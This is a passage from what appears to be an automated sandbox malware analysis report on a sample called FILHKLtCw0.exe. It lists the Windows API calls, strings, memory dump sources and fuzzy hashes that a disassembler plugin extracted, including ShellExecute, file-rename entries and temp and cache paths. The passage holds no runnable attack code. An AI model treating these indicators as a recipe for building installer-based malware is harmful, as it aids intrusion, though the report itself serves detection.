                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID: {
                                                                                                              • API String ID: 590372296-366298937
                                                                                                              • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                              • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                              • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                              • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                              • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                              • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\FILHKLtCw0.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\FILHKLtCw0.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                              • API String ID: 2624150263-2957766633
                                                                                                              • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                              • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                              • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                              • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                              APIs
                                                                                                                • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2872673692.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2872653525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872698277.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872715437.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$lstrcpy$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 4227406936-0
                                                                                                              • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                              • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                              • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                              • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                              • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                              • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                              • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                              • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                              • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                              • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                              • GetSysColor.USER32(?), ref: 00404396
                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                              • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                              • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                              • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                              • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                              • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                              • String ID: -B@$Call$N$open
                                                                                                              • API String ID: 3615053054-1446803726
                                                                                                              • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                              • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                              • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                              • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: F
                                                                                                              • API String ID: 941294808-1304234792
                                                                                                              • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                              • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                              • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                              • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                              APIs
                                                                                                              • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                              • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                              • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                              • wsprintfA.USER32 ref: 00405DFB
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                              • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\FILHKLtCw0.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                              • String ID: %ls=%ls$NUL$[Rename]
                                                                                                              • API String ID: 222337774-899692902
                                                                                                              • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                              • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                              • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                              • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\FILHKLtCw0.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                              • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                              • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\FILHKLtCw0.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                              • CharPrevW.USER32(0040A300,0040A300,75923420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                              • "C:\Users\user\Desktop\FILHKLtCw0.exe", xrefs: 0040632D
                                                                                                              • *?|<>/":, xrefs: 0040633B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: "C:\Users\user\Desktop\FILHKLtCw0.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 589700163-4097076149
                                                                                                              • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                              • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                              • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                              • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                              • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                              • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                              • GetSysColor.USER32(?), ref: 004041E4
                                                                                                              • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                              • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                              • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                              • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                              • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                              • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                              • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                              • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
